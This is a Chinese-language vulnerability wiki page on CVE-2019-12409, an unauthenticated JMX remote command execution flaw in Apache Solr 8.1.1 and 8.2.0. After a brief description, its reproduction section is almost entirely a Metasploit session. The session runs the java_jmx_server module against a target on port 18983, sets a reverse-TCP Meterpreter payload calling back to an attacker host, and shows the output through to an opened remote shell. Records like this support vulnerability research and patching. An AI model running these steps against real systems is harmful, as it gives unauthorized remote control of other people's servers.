menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Apache Solr chevron_right (CVE-2019-12409)Apache Solr 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-12409)Apache Solr 远程命令执行漏洞.md
    4.44 KB / 2021-04-21 09:23:46
        (CVE-2019-12409)Apache Solr JMX 远程命令执行漏洞
    ==================================================
    
    一、漏洞简介
    ------------
    
    **Linux** 下的环境下的Apache Solr 8.1.1和8.2.0版本
    
    存在默认不安全配置在***solr.sh***`ENABLE_REMOTE_JMX_OPTS="true"`,将导致启用JMX监视服务并将公网监听一个18983的RMI端口,且无需进行任何身份验证。
    
    二、漏洞影响
    ------------
    
    Apache Solr 8.1.1和8.2.0版本
    
    三、复现过程
    ------------
    
        msf5 > use multi/misc/java_jmx_server
        msf5 exploit(multi/misc/java_jmx_server) > show options
    
        Module options (exploit/multi/misc/java_jmx_server):
    
           Name          Current Setting  Required  Description
           ----          ---------------  --------  -----------
           JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
           JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
           JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
           RHOSTS                         yes       The target address range or CIDR identifier
           RPORT                          yes       The target port (TCP)
           SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
           SRVPORT       8080             yes       The local port to listen on.
           SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
           URIPATH                        no        The URI to use for this exploit (default is random)
    
    
        Exploit target:
    
           Id  Name
           --  ----
           0   Generic (Java Payload)
    
    
        msf5 exploit(multi/misc/java_jmx_server) > set RHOSTS a.a.a.a
        RHOSTS => a.a.a.a
        msf5 exploit(multi/misc/java_jmx_server) > set RPORT 18983
        RPORT => 18983
        msf5 exploit(multi/misc/java_jmx_server) > set payload java/meterpreter/reverse_tcp
        payload => java/meterpreter/reverse_tcp
        msf5 exploit(multi/misc/java_jmx_server) > show options
    
        Module options (exploit/multi/misc/java_jmx_server):
    
           Name          Current Setting  Required  Description
           ----          ---------------  --------  -----------
           JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
           JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
           JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
           RHOSTS        a.a.a.a     yes       The target address range or CIDR identifier
           RPORT         18983            yes       The target port (TCP)
           SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
           SRVPORT       8080             yes       The local port to listen on.
           SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
           URIPATH                        no        The URI to use for this exploit (default is random)
    
    
        Payload options (java/meterpreter/reverse_tcp):
    
           Name   Current Setting  Required  Description
           ----   ---------------  --------  -----------
           LHOST                   yes       The listen address (an interface may be specified)
           LPORT  4444             yes       The listen port
    
    
        Exploit target:
    
           Id  Name
           --  ----
           0   Generic (Java Payload)
    
    
        msf5 exploit(multi/misc/java_jmx_server) > set LHOST b.b.b.b
        LHOST => b.b.b.b
        msf5 exploit(multi/misc/java_jmx_server) > run
        [*] Started reverse TCP handler on b.b.b.b:4444
        [*] a.a.a.a:18983 - Using URL: http://b.b.b.b:8080/OcbYS8uaTPDH
        [*] a.a.a.a:18983 - Sending RMI Header...
        [*] a.a.a.a:18983 - Discovering the JMXRMI endpoint...
        [+] a.a.a.a:18983 - JMXRMI endpoint on a.a.a.a:18983
        [*] a.a.a.a:18983 - Proceeding with handshake...
        [+] a.a.a.a:18983 - Handshake with JMX MBean server on a.a.a.a:18983
        [*] a.a.a.a:18983 - Loading payload...
        [*] a.a.a.a:18983 - Replied to request for mlet
        [*] a.a.a.a:18983 - Replied to request for payload JAR
        [*] a.a.a.a:18983 - Executing payload...
        [*] a.a.a.a:18983 - Replied to request for payload JAR
        [*] Sending stage (53867 bytes) to a.a.a.a
        [*] Meterpreter session 1 opened (a.a.a.a:4444 -> b.b.b.b:46582) at 2019-11-21 15:24:53 +0000
    
        meterpreter >
    
    
    links
    file_download